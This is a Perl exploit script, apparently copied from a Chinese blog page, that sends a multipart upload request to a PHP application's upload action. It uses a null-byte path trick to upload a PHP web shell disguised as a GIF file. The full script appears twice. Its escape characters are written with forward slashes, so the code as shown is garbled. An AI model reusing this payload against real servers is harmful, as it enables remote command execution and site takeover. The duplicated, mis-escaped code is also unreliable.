#!/usr/bin/perl
$| = 1;
use Socket;
$host = "127.0.0.1";
$port = "80";
$UploadTo = "";
$str =
"-----------------------------7d41f4a600472/r/n".
"Content-Disposition: form-data; name=/"path/"/r/n".
"/r/n".
"www.ppp%00/r/n".
"-----------------------------7d41f4a600472/r/n".
"Content-Disposition: form-data; name=/"image/"; filename=/"F://tools//1.gif/"/r/n".
"Content-Type: text/plain/r/n".
"/r/n".
"<?php/r/n".
"system($c);/r/n".
"?>/r/n".
"-----------------------------7d41f4a600472--/r/n".
"/r/n";
print $str;
$len=length($str);
print $len;
$req ="POST /1/1/3721/index.php?action=upload HTTP/1.1/r/n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*/r/n".
"Referer: http://127.0.0.1/index.php?path=./r/n".
"Accept-Language: zh-cn/r/n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41f4a600472/r/n".
"Accept-Encoding: gzip, deflate/r/n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)/r/n".
"Host: 127.0.0.1/r/n".
"Content-Length: $len/r/n".
"Connection: Keep-Alive/r/n".
"Cache-Control: no-cache/r/n".
"Cookie: PHPSESSID=111111111111111111111111/r/n".
"/r/n".
"$str/r/n/r/n";
print $req;
@res = sendraw($req);
print @res;
#Hmm...Maybe you can send it by other way
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems/n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems/n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect.../n");
}
}
$| = 1;
use Socket;
$host = "127.0.0.1";
$port = "80";
$UploadTo = "";
$str =
"-----------------------------7d41f4a600472/r/n".
"Content-Disposition: form-data; name=/"path/"/r/n".
"/r/n".
"www.ppp%00/r/n".
"-----------------------------7d41f4a600472/r/n".
"Content-Disposition: form-data; name=/"image/"; filename=/"F://tools//1.gif/"/r/n".
"Content-Type: text/plain/r/n".
"/r/n".
"<?php/r/n".
"system($c);/r/n".
"?>/r/n".
"-----------------------------7d41f4a600472--/r/n".
"/r/n";
print $str;
$len=length($str);
print $len;
$req ="POST /1/1/3721/index.php?action=upload HTTP/1.1/r/n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*/r/n".
"Referer: http://127.0.0.1/index.php?path=./r/n".
"Accept-Language: zh-cn/r/n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41f4a600472/r/n".
"Accept-Encoding: gzip, deflate/r/n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)/r/n".
"Host: 127.0.0.1/r/n".
"Content-Length: $len/r/n".
"Connection: Keep-Alive/r/n".
"Cache-Control: no-cache/r/n".
"Cookie: PHPSESSID=111111111111111111111111/r/n".
"/r/n".
"$str/r/n/r/n";
print $req;
@res = sendraw($req);
print @res;
#Hmm...Maybe you can send it by other way
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems/n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems/n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect.../n");
}
}
扫一扫
177
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
